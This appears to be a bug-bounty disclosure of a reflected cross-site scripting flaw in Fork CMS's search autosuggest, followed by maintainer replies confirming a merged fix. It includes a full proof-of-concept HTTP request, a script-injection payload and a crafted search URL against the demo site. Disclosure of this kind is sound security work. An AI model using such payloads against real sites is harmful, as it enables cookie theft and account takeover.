Cross-site Scripting (XSS) - Reflected in forkcms/forkcms

Valid

Reported on

Sep 23rd 2021


Description

Reflected XSS in form Search

Proof of Concept

// PoC.request
POST /frontend/ajax HTTP/1.1
Host: demo.fork-cms.com
Cookie: frontend_language=en; PHPSESSID=megjfhiirsim3v6klp91i7qjat
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.fork-cms.com/en
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 139
Origin: https://demo.fork-cms.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

fork%5Bmodule%5D=Search&fork%5Baction%5D=Autosuggest&fork%5Blanguage%5D=en&term=%22%3E%3CsCrIpt%3Ealert(%22XsS%22)%3C%2FscRiPt%3E&length=55

Step to Reproduct

At form Search input with payload: "><sCrIpt>alert("XsS")</scRiPt>

OR

Goto Url: https://demo.fork-cms.com/en/search?form=search&q_widget=%22%3E%3CsCrIpt%3Ealert%28%22XsS%22%29%3C%2FscRiPt%3E&submit=search

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the forkcms team and are waiting to hear back 2 months ago
Jelmer Prins
2 months ago

Maintainer


This is normally already fixed on master, but I'll verify it next week

lethanhphuc
2 months ago

Researcher


Hi Jelmer, pls update the report status if you fixed it

lethanhphuc
2 months ago

Researcher


@maintainer Can you validate the report pls?

Jelmer Prins validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins confirmed that a fix has been merged on 76bf73 2 months ago
Jelmer Prins has been awarded the fix bounty